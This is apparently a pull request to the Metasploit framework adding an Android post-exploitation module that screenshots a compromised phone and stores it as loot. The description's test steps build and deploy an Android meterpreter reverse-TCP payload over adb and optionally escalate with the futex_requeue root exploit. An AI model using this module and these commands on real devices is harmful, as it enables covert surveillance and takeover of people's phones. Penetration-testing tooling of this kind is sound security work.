### PR TITLE
Add screencap for Android

### DIFF
--- a/modules/post/android/capture/screen.rb
+++ b/modules/post/android/capture/screen.rb
@@ -1,0 +1,73 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit4 < Msf::Post
+
+  include Msf::Post::File
+
+  def initialize(info={})
+    super( update_info( info,
+        'Name'          => 'Android Screen Capture',
+        'Description'   => %q{
+          This module takes a screenshot of the target phone.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [ 'timwr' ],
+        'Platform'      => [ 'android' ],
+        'SessionTypes'  => [ 'shell', 'meterpreter' ]
+      ))
+
+    register_options(
+      [
+        OptString.new('TMP_PATH', [true, 'Path to remote temp directory', '/data/local/tmp/']),
+        OptString.new('EXE_PATH', [true, 'Path to remote screencap executable', '/system/bin/screencap'])
+      ], self.class)
+  end
+
+  def run
+    id = cmd_exec('id')
+    unless id =~ /root/ or id =~ /shell/
+      print_error("This module requires shell or root permissions")
+      return
+    end
+
+    exe_path = datastore['EXE_PATH']
+    tmp_path = datastore['TMP_PATH']
+    if not file?(exe_path)
+      print_error("Aborting, screencap binary not found.")
+      return
+    end
+
+    begin
+      file = "#{tmp_path}/#{Rex::Text.rand_text_alpha(7)}.png"
+      cmd_exec("#{exe_path} -p #{file}")
+      print_good("Downloading screenshot...")
+      data = read_file(file)
+      file_rm(file)
+    rescue ::Rex::Post::Meterpreter::RequestError => e
+      print_error("Error taking the screenshot")
+      vprint_error("#{e.class} #{e} #{e.backtrace}")
+      return
+    end
+
+    unless data
+      print_error("No data for screenshot")
+      return
+    end
+
+    begin
+      fn = "screenshot.png"
+      location = store_loot("screen_capture.screenshot", "image/png", session, data, fn, "Screenshot")
+      print_good("Screenshot saved at #{location}")
+    rescue ::IOError, ::Errno::ENOENT => e
+      print_error("Error storing screenshot")
+      vprint_error("#{e.class} #{e} #{e.backtrace}")
+      return
+    end
+  end
+end


### PR DESCRIPTION
This module adds a screen capture module for Android.
There are two ways to test it, for both you will need a handler and an android device attached with adb:
- [ ] `LHOST=$(hostname -I); ./msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j"`

(1) Start a session running as the adb shell user:

```
./msfvenom -p android/meterpreter/reverse_tcp LHOST=$LHOST LPORT=4444 -o "$1"
jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA "$1" androiddebugkey
adb push "$1" /data/local/tmp
adb shell "cd /data/local/tmp; chmod 766 $1; dalvikvm -Xbootclasspath:/system/framework/core.jar -cp $1 com.metasploit.stage.Payload"
```

(2 (optional)) Get a normal android/meterpreter/reverse_tcp session and use the futex_requeue exploit to gain root on the device (you will need a vulnerable device):

```
./msfvenom -p android/meterpreter/reverse_tcp LHOST=$LHOST LPORT=4444 -o "$1"
jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA "$1" androiddebugkey
adb install "$1"
adb shell am start -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
# on the handler:
use exploit/android/local/futex_requeue
set LHOST <tab>
set LPORT 4445
set session 1
exploit
```
- [ ] use the screencap module, you should get a screenshot in your  ~/.msf4/loot/ directory

```
use post/android/capture/screen
set session 1
exploit
```

p.s It's worth testing this on a screen that compresses well or you might be waiting a while for the download on a high definition (1080p+) phone.
